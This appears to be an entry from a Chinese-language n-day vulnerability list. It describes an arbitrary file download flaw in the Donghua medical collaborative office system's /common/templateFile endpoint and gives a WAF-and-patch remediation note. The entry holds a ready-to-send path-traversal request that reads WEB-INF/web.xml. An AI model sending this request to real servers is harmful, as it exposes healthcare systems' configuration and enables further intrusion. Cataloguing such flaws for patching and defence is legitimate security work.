vendor = "东华"
name = "东华医疗协同办公系统templateFile存在任意文件下载漏洞"
type = "任意文件下载"
version = "未知"
path = "/common/templateFile"
detail = "GET /common/templateFile?template_name=../../WEB-INF/web.xml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
fix = "WAF封禁路路径，等待发布补丁"
date = "0819"
label = "nday"
